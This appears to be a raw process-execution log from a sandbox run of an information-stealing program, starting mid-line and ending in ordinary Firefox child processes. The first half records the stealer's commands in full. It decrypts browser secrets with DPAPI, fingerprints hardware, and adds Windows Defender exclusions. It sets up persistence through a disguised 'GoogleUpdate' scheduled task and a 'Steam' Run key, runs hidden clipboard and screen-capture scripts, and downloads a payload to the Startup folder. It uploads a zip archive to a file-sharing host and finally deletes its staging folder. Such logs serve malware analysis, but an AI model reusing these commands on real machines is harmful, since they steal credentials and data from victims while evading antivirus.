, $null, 'CurrentUser')
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,30,33,9,7,82,225,214,92,15,159,202,147,139,45,89,87,231,151,227,53,170,79,92,11,223,143,97,106,97,154,161,9,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,21,253,137,58,142,103,70,102,12,189,67,174,111,249,213,75,220,211,167,169,116,14,13,182,98,95,162,252,2,230,176,103,48,0,0,0,52,214,32,138,26,48,216,25,50,239,33,228,149,1,46,204,28,5,199,198,129,96,1,203,31,101,98,78,63,94,55,14,217,3,117,232,82,31,234,98,233,98,205,228,177,255,26,93,64,0,0,0,130,107,36,32,57,149,185,197,48,184,95,52,114,206,152,10,184,207,1,53,59,142,23,125,248,153,95,41,99,30,222,95,238,92,97,132,248,36,245,34,7,59,219,119,201,126,196,81,133,18,22,202,225,208,186,249,141,11,195,129,16,159,30,250), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,238,156,48,203,153,40,183,74,155,57,209,91,118,45,98,188,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,30,33,9,7,82,225,214,92,15,159,202,147,139,45,89,87,231,151,227,53,170,79,92,11,223,143,97,106,97,154,161,9,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,21,253,137,58,142,103,70,102,12,189,67,174,111,249,213,75,220,211,167,169,116,14,13,182,98,95,162,252,2,230,176,103,48,0,0,0,52,214,32,138,26,48,216,25,50,239,33,228,149,1,46,204,28,5,199,198,129,96,1,203,31,101,98,78,63,94,55,14,217,3,117,232,82,31,234,98,233,98,205,228,177,255,26,93,64,0,0,0,130,107,36,32,57,149,185,197,48,184,95,52,114,206,152,10,184,207,1,53,59,142,23,125,248,153,95,41,99,30,222,95,238,92,97,132,248,36,245,34,7,59,219,119,201,126,196,81,133,18,22,202,225,208,186,249,141,11,195,129,16,159,30,250), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "sc config "Steam Client Service" start=disabled"
C:\Windows\system32\sc.exe
sc config "Steam Client Service" start=disabled
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\f5jwmi4n\f5jwmi4n.cmdline"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8A11.tmp" "c:\Users\Admin\AppData\Local\Temp\f5jwmi4n\CSC1556E0DAFDB493FA0E7B8B181B8B64.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
C:\Windows\system32\getmac.exe
getmac /NH
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe" /f
C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Pogmxnrt.zip";"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\curl.exe
curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Pogmxnrt.zip";
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.0.27215710\1063592625" -parentBuildID 20230214051806 -prefsHandle 1784 -prefMapHandle 1524 -prefsLen 22035 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0f4faf4-c264-47bd-a90e-2797bec149ab} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 1864 2185e010b58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.1.563846262\1015350981" -parentBuildID 20230214051806 -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 22071 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dce366c9-7079-4437-ba10-bb03c3f54416} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 2388 2185128ab58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.2.255791635\1987724925" -childID 1 -isForBrowser -prefsHandle 2984 -prefMapHandle 3000 -prefsLen 22109 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e72fce61-b52a-46b4-b7e5-f15a0025f959} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 2992 218608f1058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.3.757256289\1805141213" -childID 2 -isForBrowser -prefsHandle 3368 -prefMapHandle 3364 -prefsLen 27575 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {63d11a16-7847-40f5-a7d5-a946bdea539a} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 3568 218634c4758 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.4.897920699\1156673394" -childID 3 -isForBrowser -prefsHandle 5148 -prefMapHandle 5144 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {43f4c757-817d-4f76-bc3c-559e0be7ca4f} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 5104 21865544d58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.5.62187172\1927483691" -childID 4 -isForBrowser -prefsHandle 5376 -prefMapHandle 5372 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b6e05c4b-2c2a-4778-b980-25d7577bdd7d} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 5384 2186601a858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.6.1602546119\2133810384" -childID 5 -isForBrowser -prefsHandle 5280 -prefMapHandle 5284 -prefsLen 27614 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5203dbc1-8cc1-4f8e-9558-e384b16fde3f} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 5528 2186601ab58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.7.186091430\1478116529" -childID 6 -isForBrowser -prefsHandle 5900 -prefMapHandle 5896 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94cc6ce3-37cd-4b54-b776-b435d46f2b96} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 5912 21867839858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1704.8.1041450222\834470622" -childID 7 -isForBrowser -prefsHandle 6188 -prefMapHandle 6168 -prefsLen 27695 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b7102e2a-3cb4-419b-9131-c64274957903} 1704 "\\.\pipe\gecko-crash-server-pipe.1704" 6196 21867eb3658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
